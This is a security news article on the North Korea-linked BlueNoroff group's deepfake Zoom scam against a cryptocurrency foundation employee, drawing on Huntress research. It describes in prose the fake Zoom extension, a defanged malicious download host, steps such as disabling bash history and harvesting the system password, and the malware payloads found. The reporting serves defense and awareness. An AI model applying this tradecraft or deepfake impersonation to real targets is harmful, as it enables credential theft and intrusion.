North Korea-linked hacking group BlueNoroff has executed a sophisticated deepfake Zoom scam to infiltrate a cryptocurrency foundation.
What happened
A North Korea–linked cyber‑espionage unit known as BlueNoroff executed a sophisticated deepfake Zoom scam targeting a Web3 employee at a cryptocurrency foundation. The attacker contacted the victim via Telegram, posing as an external professional and sending a Calendly link. Although appearing to schedule a Google Meet, it redirected employees to a fake Zoom domain under attacker control.
When the employee joined, they encountered a group Zoom session featuring AI-generated deepfake video feeds of their own senior executives. In the context of microphone troubles, the deepfakes advised the target to install a “Zoom extension,” which actually delivered a malicious AppleScript dubbed zoom_sdk_support.scpt.
Going deeper
Once activated, the AppleScript opened a legitimate Zoom SDK page, then secretly fetched a shell script from a malicious server (“support[.]us05web‑zoom[.]biz”). The script disabled bash history logging, checked for Rosetta 2 (installing it silently if necessary), created a hidden “.pwd” file, and downloaded multiple malicious binaries to “/tmp/icloud_helper,” all while prompting the user to enter their system password.
Huntress identified at least eight malware payloads on the compromised machine, including:
- Telegram 2: a Nim-based backdoor for persistence
- Root Troy V4: a Go-based remote controller
- InjectWithDyld: a C++ loader for process injection
- XScreen: an Objective‑C keylogger capturing keystrokes, clipboard, and screen
- CryptoBot: Go-based stealer focusing on crypto‑related data
- NetChk: an idle “random number generator” payload
What was said
According to Huntress, Security researchers Alden Schmidt, Stuart Ashenbrenner, and Jonathan Semon (Huntress) explained that “The Calendly link was for a Google Meet event, but when clicked… redirects the end user to a fake Zoom domain controlled by the threat actor.” They added: “Remote workers, especially in high‑risk areas of work, are often the ideal targets for groups like TA444… It is important to train employees to identify common attacks that start off with social engineering related to remote meeting software.”
In the know
Deepfakes are hyper-realistic synthetic media created using artificial intelligence (AI), particularly deep learning algorithms, that manipulate or generate audio, video, or images to convincingly mimic real people. In cybercrime, deepfakes can be used to impersonate trusted individuals, such as executives or colleagues, during virtual meetings, making it easier for attackers to deceive victims into revealing sensitive information, installing malware, or authorizing fraudulent transactions.
Go deeper: What are deepfakes?
FAQS
What was unique about this recent attack?
This attack combined deepfake video manipulation with social engineering over a fake Zoom call and used malware disguised as a Zoom extension to compromise a macOS system—a rare and sophisticated combination.
How can I spot a deepfake during a video call?
Look for visual anomalies like unnatural blinking, lag between lip movement and speech, poor lighting consistency, or audio that doesn’t match the speaker’s mouth movements.
Tshedimoso Makhene
